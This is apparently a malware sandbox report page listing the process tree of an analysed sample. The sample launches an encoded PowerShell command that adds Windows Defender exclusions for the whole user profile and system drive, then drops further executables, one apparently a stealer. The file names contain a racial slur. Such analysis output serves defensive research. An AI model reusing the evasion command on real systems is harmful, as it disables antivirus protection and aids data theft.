| ZeroBOX

Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

| ZeroBOX

nigguy_1.exe "C:\Users\test22\AppData\Local\Temp\nigguy_1.exe"
804
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAZwBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcgBxACMAPgA="
  2060
- nig_guy1.exe "C:\Users\test22\AppData\Roaming\nig_guy1.exe"
  2116
- stlr.exe "C:\Users\test22\AppData\Local\Temp\stlr.exe"
  2156

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf